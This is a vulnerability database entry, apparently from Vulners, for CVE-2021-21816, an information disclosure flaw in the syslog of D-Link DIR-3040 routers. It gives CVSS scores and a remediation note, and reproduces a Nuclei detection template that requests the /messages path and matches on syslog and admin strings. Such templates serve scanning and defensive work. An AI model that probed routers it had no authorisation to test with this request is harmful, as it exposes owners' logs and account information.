Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-21816
HistoryJul 31, 2021 - 5:39 p.m.

D-Link DIR-3040 1.13B03 - Information Disclosure

2021-07-3117:39:35
ProjectDiscovery
github.com
1

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

4.6 Medium

AI Score

Confidence

High

0.003 Low

EPSS

Percentile

71.7%

D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

id: CVE-2021-21816

info:
  name: D-Link DIR-3040 1.13B03 - Information Disclosure
  author: gy741
  severity: medium
  description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks.
  remediation: |
    Upgrade the router firmware to the latest version provided by D-Link.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21816
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2021-21816
    cwe-id: CWE-200
    epss-score: 0.00229
    epss-percentile: 0.60334
    cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dir-3040_firmware
  tags: cve2021,cve,dlink,exposure,router,syslog

http:
  - method: GET
    path:
      - "{{BaseURL}}/messages"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "syslog:"
          - "admin"
          - "/etc_ro/lighttpd/www"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205524508cec5a7648f3525efc7cc61e2269f85a2218a048a07c6d27965360ef0b022100cffbf244af2a53310124e9534e57a43bad9b0e544ee49ab2bfdcca089ad71ce8:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

4.6 Medium

AI Score

Confidence

High

0.003 Low

EPSS

Percentile

71.7%